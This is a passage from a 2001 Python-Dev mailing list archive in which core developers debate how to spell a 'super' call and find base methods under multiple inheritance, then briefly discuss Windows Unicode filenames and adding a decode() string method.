    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurance of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurance of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 16:06:39 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)

Thomas


From guido at digicool.com  Wed May  2 17:11:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
             <3AF01381.592AE31B@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF01381.592AE31B@lemburg.com> 
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritence,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritence tree using the standard Python lookup 
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritence tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritence
> (e.g. the same base class may appear in different branches of the
> inheritence tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:19:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
             <3AF013ED.8A190FE2@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF013ED.8A190FE2@lemburg.com> 
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:23:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:29:20 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
	            <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo meaning the method overridden
by D.foo. To get at the basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> http://mail.python.org/mailman/listinfo/python-dev

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Wed May  2 16:15:58 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)

Cheers /F


From donb at abinitio.com  Wed May  2 16:41:14 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
that I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here in the implementation of getattr on the '_'.  It return
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller at ion-tof.com  Wed May  2 16:49:02 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
Runtime error: maximum recursion depth exceeded

This is because super(self).test for the Z() object
should start the search in the X class, not in the Y class.


Thomas


From thomas.heller at ion-tof.com  Wed May  2 16:53:17 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

Thomas


From donb at abinitio.com  Wed May  2 17:31:45 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we dont know which base class to choose as the starting point for the
search.  This problem already exist.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From donb at abinitio.com  Wed May  2 17:37:39 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik at effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You cant ask the instance for it
since it's value is different depending on in which it is needed Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

wont.  Now, dont go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__base__[0].__repr__(self)

will do you any good either ;) Because it wont!

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Wed May  2 19:02:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
             <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm at hypernet.com  Wed May  2 18:01:20 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you wnat 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of SmallTalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik at effbot.org  Wed May  2 17:47:08 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You cant ask the instance for it
> since it's value is different depending on in which it is needed

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal at lemburg.com  Wed May  2 18:11:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 19:17:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
             <00a901c0d31f$2797a370$e46940d5@hagrid> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>  
            <00a901c0d31f$2797a370$e46940d5@hagrid> 
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:13:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in form of codecs...

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:18:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
             <3AF04E3D.45AE4F4B@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> 
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:32:46 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some example of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:38:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
             <3AF052CE.E928BDA1@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
            <3AF052CE.E928BDA1@lemburg.com> 
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some example of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Wed May  2 20:20:24 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
